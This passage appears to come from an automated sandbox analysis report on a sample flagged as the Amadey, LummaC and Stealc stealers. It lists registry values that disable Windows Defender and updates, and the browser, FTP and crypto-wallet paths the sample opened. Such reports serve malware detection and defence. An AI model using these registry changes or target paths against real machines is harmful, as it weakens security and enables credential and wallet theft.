Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000995001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 12_2_00FD8195
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FBD27A GetUserNameW, 12_2_00FBD27A
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F9B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 12_2_00F9B952
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 12_2_00F642DE
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Registry value created: TamperProtection 0 Jump to behavior
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
AV process strings found (often used to terminate AV products)
Source: file.exe, 00000000.00000003.2258303293.00000000055AC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2251184571.00000000055B1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246554241.00000000055AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 3.2.OLR88CERN7VQFRQ38J.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.skotes.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.2411955466.0000000004930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2405168381.0000000000131000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2364843003.00000000047F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2722993454.0000000004890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2764558562.0000000000131000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: 00000021.00000003.2991405310.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d7c50276ff.exe PID: 6488, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 27.2.num.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.7d61336cf8.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.0.num.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.num.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.num.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.7d61336cf8.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ENORVNMU067PBMHUGECCERYC06W3ZY.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000000.2667130005.00000000009E1000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.2760497126.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2926562320.0000000001187000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.2909397637.00000000009E1000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2687324655.00000000009E1000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2591227334.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2924335248.00000000009E1000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2688771618.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2493072660.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2404591407.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2635976470.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2807278591.0000000000A21000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2634884064.0000000000A21000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2806511011.000000000082B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2492114993.00000000004D1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ENORVNMU067PBMHUGECCERYC06W3ZY.exe PID: 5636, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7d61336cf8.exe PID: 1468, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
